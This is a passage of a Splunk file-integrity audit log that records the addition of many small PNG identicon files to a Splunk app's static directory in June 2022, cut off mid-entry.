Audit:[timestamp=10-06-2022 17:42:53.417, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/340.png", isdir=0, size=356, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.413, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/34.png", isdir=0, size=378, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.409, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/339.png", isdir=0, size=387, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.404, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/338.png", isdir=0, size=346, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.400, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/337.png", isdir=0, size=357, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.396, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/336.png", isdir=0, size=398, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.391, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/335.png", isdir=0, size=372, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.387, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/334.png", isdir=0, size=282, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.381, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/333.png", isdir=0, size=388, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.377, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/332.png", isdir=0, size=331, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.373, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/331.png", isdir=0, size=399, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.368, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/330.png", isdir=0, size=374, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.364, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/33.png", isdir=0, size=315, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.360, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/329.png", isdir=0, size=346, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.355, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/328.png", isdir=0, size=345, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.350, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/327.png", isdir=0, size=294, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.346, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/326.png", isdir=0, size=376, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.342, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/325.png", isdir=0, size=286, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.338, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/324.png", isdir=0, size=386, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.334, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/323.png", isdir=0, size=349, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.330, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/322.png", isdir=0, size=298, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.327, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/321.png", isdir=0, size=365, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.323, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/320.png", isdir=0, size=314, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.319, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/32.png", isdir=0, size=340, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.316, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/319.png", isdir=0, size=404, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.312, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/318.png", isdir=0, size=378, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.308, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/317.png", isdir=0, size=366, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.303, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/316.png", isdir=0, size=384, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.299, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/315.png", isdir=0, size=388, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.295, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/314.png", isdir=0, size=366, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.291, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/313.png", isdir=0, size=387, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.287, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/312.png", isdir=0, size=273, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.283, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/311.png", isdir=0, size=378, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.279, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/310.png", isdir=0, size=390, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.276, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/31.png", isdir=0, size=391, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.272, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/309.png", isdir=0, size=273, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.268, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/308.png", isdir=0, size=391, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.264, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/307.png", isdir=0, size=374, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.260, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/306.png", isdir=0, size=328, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.256, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/305.png", isdir=0, size=355, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.252, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/304.png", isdir=0, size=365, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.246, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/303.png", isdir=0, size=322, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.243, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/302.png", isdir=0, size=353, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.239, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/301.png", isdir=0, size=400, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.235, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/300.png", isdir=0, size=363, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.232, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/30.png", isdir=0, size=389, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.228, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/3.png", isdir=0, size=344, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.224, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/299.png", isdir=0, size=338, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.220, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/298.png", isdir=0, size=345, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.216, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/297.png", isdir=0, size=332, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.212, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/296.png", isdir=0, size=344, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.207, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/295.png", isdir=0, size=340, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.204, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/294.png", isdir=0, size=328, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.200, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/293.png", isdir=0, size=323, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.196, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/292.png", isdir=0, size=361, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.192, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/291.png", isdir=0, size=362, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.188, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/290.png", isdir=0, size=378, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.184, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/29.png", isdir=0, size=304, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.181, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/289.png", isdir=0, size=332, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.176, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/288.png", isdir=0, size=343, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.172, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/287.png", isdir=0, size=333, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.168, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/286.png", isdir=0, size=359, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.164, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/285.png", isdir=0, size=396, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.161, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/284.png", isdir=0, size=350, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.157, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/283.png", isdir=0, size=384, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.151, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/282.png", isdir=0, size=360, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.147, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/281.png", isdir=0, size=359, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.143, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/280.png", isdir=0, size=338, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.138, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/28.png", isdir=0, size=344, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.135, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/279.png", isdir=0, size=353, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.131, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/278.png", isdir=0, size=301, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.125, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/277.png", isdir=0, size=347, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.121, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/276.png", isdir=0, size=375, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.117, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/275.png", isdir=0, size=376, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.113, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/274.png", isdir=0, size=274, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.107, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/273.png", isdir=0, size=369, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.103, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/272.png", isdir=0, size=356, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.099, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/271.png", isdir=0, size=407, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.094, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/270.png", isdir=0, size=370, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.090, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/27.png", isdir=0, size=357, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.085, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/269.png", isdir=0, size=360, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.080, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/268.png", isdir=0, size=386, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.075, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/267.png", isdir=0, size=294, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.069, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/266.png", isdir=0, size=407, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.065, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/265.png", isdir=0, size=344, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.061, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/264.png", isdir=0, size=348, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.056, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/263.png", isdir=0, size=400, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.052, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/262.png", isdir=0, size=347, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.047, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/261.png", isdir=0, size=328, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.043, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/260.png", isdir=0, size=390, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.039, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/26.png", isdir=0, size=365, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.036, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/259.png", isdir=0, size=354, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.030, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/258.png", isdir=0, size=372, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.026, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/257.png", isdir=0, size=396, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.022, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/256.png", isdir=0, size=372, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.018, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/255.png", isdir=0, size=377, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.014, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/254.png", isdir=0, size=342, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.010, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/253.png", isdir=0, size=360, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.006, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/252.png", isdir=0, size=388, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.001, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/251.png", isdir=0, size=354, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.997, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/250.png", isdir=0, size=362, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.993, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/25.png", isdir=0, size=354, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.989, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/249.png", isdir=0, size=374, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.986, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/248.png", isdir=0, size=369, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.982, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/247.png", isdir=0, size=383, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.979, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/246.png", isdir=0, size=319, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.975, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/245.png", isdir=0, size=335, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.972, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/244.png", isdir=0, size=383, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.969, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/243.png", isdir=0, size=321, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.965, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/242.png", isdir=0, size=394, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.961, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/241.png", isdir=0, size=382, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.958, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/240.png", isdir=0, size=372, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.954, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/24.png", isdir=0, size=378, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.951, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/239.png", isdir=0, size=409, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.947, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/238.png", isdir=0, size=346, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.944, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/237.png", isdir=0, size=342, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.938, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/236.png", isdir=0, size=274, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.934, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/235.png", isdir=0, size=298, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.929, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/234.png", isdir=0, size=357, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.925, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/233.png", isdir=0, size=358, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.921, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/232.png", isdir=0, size=374, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.917, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/231.png", isdir=0, size=383, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", 